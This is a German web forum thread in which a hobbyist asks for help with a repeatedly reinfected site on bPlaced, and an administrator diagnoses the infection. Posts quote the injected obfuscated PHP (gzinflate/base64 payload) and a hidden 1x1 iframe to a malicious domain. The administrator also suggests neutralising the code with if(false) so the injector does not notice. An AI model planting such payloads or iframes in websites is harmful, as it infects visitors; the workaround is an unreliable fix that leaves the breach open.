 infizierte Homepage; was tun? |
bambi.bummler
ehemals Tiamat
Dabei seit: 07.02.2007
Beiträge: 1.229
Herkunft: Thüringen
 |
|
| infizierte Homepage; was tun? |
     |
Ich habe jetzt einige Zeit nichts an meiner Homepage getan, war lange inaktiv.
Als ich jetzt nach etwa 2 Monaten wieder dran ging, gingen merkwürdige Dinge
vor und mein Virenprogramm hat Alarm geschlagen. Wenn ich allerdings von
SafeWeb scannen lasse kommt das: klick
Auch einige der User kommen nicht mehr auf die Seite, da ihr Virenprogramm
das ganze blockiert.
Ich bin da im Moment echt leicht überfordert, Google hilft auch nicht wirklich
weiter. Was kann man in so einem Fall tun?
__________________
|
|
23.08.2011 20:32 |
|
|
Schatti
Mitglied
Dabei seit: 21.04.2007
Beiträge: 12.242
|
|
Bei mir kommt es auch.
Hast du vlt irgendwelche externe Links drinnen zu Seiten die "gefährdet" sein könnten?
Oder was ich machen würde, ich würde mal bplaced anschreiben und dort Fragen?
|
|
|
23.08.2011 20:44 |
|
|
Oli
Server-Administrator
Dabei seit: 13.06.2010
Beiträge: 1.540
|
|
Hi,
habs mir gerade angesehen, also es ist so, dass auf den Seiten ein schädlicher Code, ein Javascript, eingefügt wurde. Dabei wurde ein Trick angewendet - der Schadcode befindet sich auf einer anderen Seite, die per iFrame eingefügt wurde. Das bedeutet, dass deine Seite selbst bei einem Check natürlich keinen Schadcode beinhaltet, er beim Aufruf aber trotzdem ausgeführt wird.
Das einfachste wäre, wenn du alle Dateien, die Betroffen sein könnten (Dateien mit PHP, HTML, Javascript, etc.), neu hochlädst. Von binären Dateien (also Dateien, die keinen lesbaren Text beinhalten), wie z.B. Bildern, geht keine Gefahr aus.
Alternativ dazu müsstest du alle Dateien absuchen und schauen, ob darin Code eingefügt wurde, der da nicht hingehört. Beim Durchgehen der Dateien solltest du dich aber nicht auf einen eventuellen "Änderungszeitpunkt" der Datei verlassen - den kann man beliebig verändern, wenn man weiß, wie.
LG,
Oli
|
|
|
23.08.2011 20:47 |
|
|
bambi.bummler
ehemals Tiamat
Dabei seit: 07.02.2007
Beiträge: 1.229
Herkunft: Thüringen
Themenstarter 
|
|
mh. ich habe gerade mal geschaut. in der index vom forum habe ich das gefunden:
| php: |
1:
2:
3:
|
#a6a359#
echo(gzinflate(base64_decode("Jc1JDoMwDEDRq3jHjiRSK1CF6VlCBmKVDHJc0eO3Kpv/ln+hyDYH+Her7AOjhhRoT4IGTvKSfnbH9Tio7FgqdHY4JJH2UCpbKl3eMZ6VX6OrWVHx4TO21J7ScJqDMTrend30dIt6gBUWdT3XLw==")));
#/a6a359# |
|
und im quelltext das hier; definitiv der link zu ner als schädlich bekannten seite:
| php: |
1:
|
<iframe frameborder=0 height=1 width=1 scrolling=no src='http://mainstuffwork.com/index.php?tp=78e110f5cab074f0' > </iframe> <dv align='center'> |
|
Allerdings hatte ich auf Verdacht & Verzweiflung hin gestern schonmal die gesamte Homepage gelöscht && neu hochgeladen aus einer definitiv nicht infizierten Sicherung. Da war's einen Tag gut && dann war wieder der Mist drin. Reicht es die Passwörter überall zu verändern? Hab da leider echt keine Ahnung diesbezüglich, ist mir bis jetzt noch nie passiert.
__________________
|
|
|
23.08.2011 20:55 |
|
|
Oli
Server-Administrator
Dabei seit: 13.06.2010
Beiträge: 1.540
|
|
Hi,
welche Forensoftware ist das? Möglicherweise weiß der Angreifer, wie man sich darüber den Zugriff verschaffen kann. In diesem Fall solltest du Googlen, ob es für die Forensoftware Updates oder ähnliches gibt. Manchmal gibt es auch von Hobbyprogrammierern geschriebene "Anleitungen zur Behebung des Problems".
Wenn der Angreifer nicht über etwas kommt, das sich auf deinem Webspace befindet, hat der Angreifer einen höheren Zugriff; d.h., er ist nicht an die selben Einschränkungen gebunden, die du hast - das wäre dann ein Sicherheitsproblem bei bPlaced. In diesem Fall kannst du den Angreifer höchstens austricksen, da das vermutlich nicht von einer Person eingefügt wird, sondern ein automatisierter Vorgang ist. Das eigentliche Problem ist dadurch aber nicht gelöst - das kann dann nur bPlaced tun. In diesem Fall könnte das alle bPlaced-Nutzer betreffen. @Alle bPlaced-Nutzer: Checkt vorsichtshalber eure Dateien auf Schadcode!
Grundsätzlich ist anzunehmen, dass der Angreifer möglichst viele Ziele zur selben Zeit angreifen möchte; daher ist es unwahrscheinlich, dass er hierfür z.B. deinen FTP-Account nutzt. Dazu müsste er schließlich, für jedes neue Ziel, das Passwort erneut herausfinden. Das wäre nicht effektiv genug.
LG,
Oli
|
|
|
23.08.2011 21:08 |
|
|
bambi.bummler
ehemals Tiamat
Dabei seit: 07.02.2007
Beiträge: 1.229
Herkunft: Thüringen
Themenstarter
|
|
keine forensoftware, ich habe das forum selbst geschrieben. also
fremdsoftware ist auf der gesamten homepage nicht zu finden da ich
alles selbst geschrieben habe. daher kann es an der forensoftware nicht
liegen o__O ich werde jetzt mal ne mail an bplaced schicken. von einer
freundin weiß ich, dass eine ebenso auf bplaced geladene homepage das
gleiche problem hat/hatte.
__________________
|
|
|
23.08.2011 21:14 |
|
|
Oli
Server-Administrator
Dabei seit: 13.06.2010
Beiträge: 1.540
|
|
In diesem Fall ist natürlich anzunehmen, dass der Angreifer über bPlaced bzw. ein Sicherheitsproblem bei bPlaced kommt. Natürlich wäre auch ein Sicherheitsproblem in anderen Programmen, die auf dem Server laufen, denkbar.
Es ist übrigens nicht das erste Mal, dass ich von etwas in dieser Art höre - und damals nicht auf bPlaced. Schon damals war es ein Rätsel, wie dieser Code dort reinkommen konnte.
Jedenfalls empfehle ich dir, falls du die Seite online lassen möchtest, den Code auf der Seite zu lassen. Es ist anzunehmen, dass ein automatisierter Vorgang überprüft, ob der Code noch drin ist und ihn, wenn er fehlt, wieder einfügt. Ich schlage daher folgenden Trick vor:
| php: |
1:
2:
3:
4:
5:
6:
7:
|
if ( false ) {
#a6a359#
echo(gzinflate(base64_decode("Jc1JDoMwDEDRq3jHjiRSK1CF6VlCBmKVDHJc0eO3Kpv/ln+hyDYH+Her7AOjhhRoT4IGTvKSfnbH9Tio7FgqdHY4JJH2UCpbKl3eMZ6VX6OrWVHx4TO21J7ScJqDMTrend30dIt6gBUWdT3XLw==")));
#/a6a359#
} |
|
Beim Durchsuchen der Datei ist der Code noch vorhanden, er wird jedoch niemals ausgeführt werden. Ein Script/Programm sollte das jedoch nicht bemerken 
.
LG,
Oli
|
|
|
23.08.2011 21:29 |
|
|
bambi.bummler
ehemals Tiamat
Dabei seit: 07.02.2007
Beiträge: 1.229
Herkunft: Thüringen
Themenstarter
|
|
Von bPlaced habe ich leider eine sehr unfreundliche eMail erhalten bzgl. der
Thematik, obwohl ich nun von einigen Bekannten weiß die das gleiche
Problem bei bplaced haben. Aber gut, ich habe den Code so eingefügt
und alles neu hochgeladen. Siehe da: keine Fehlermeldung mehr. Für den
Übergang echt super, so kann ich in Ruhe alles korrigieren ohne die Seite in
der Zeit offline zu nehmen. Vielen Dank! (:
__________________
|
|
|
23.08.2011 22:17 |
|
|
Oli
Server-Administrator
Dabei seit: 13.06.2010
Beiträge: 1.540
|
|
| Zitat: |
Original von bambi.bummler
Aber gut, ich habe den Code so eingefügt
und alles neu hochgeladen. Siehe da: keine Fehlermeldung mehr. Für den
Übergang echt super, so kann ich in Ruhe alles korrigieren ohne die Seite in
der Zeit offline zu nehmen. Vielen Dank! (: |
Nichts zu danken. Falls das Script entgegen meiner Erwartung den Trick durchschauen sollte, wirst du es ja an der Fehlermeldung merken - in diesem Fall kann ich dir auch noch kompliziertere Alternativen dafür geben
.
LG,
Oli
|
|
|
23.08.2011 22:23 |
|
|
|
Impressum
|
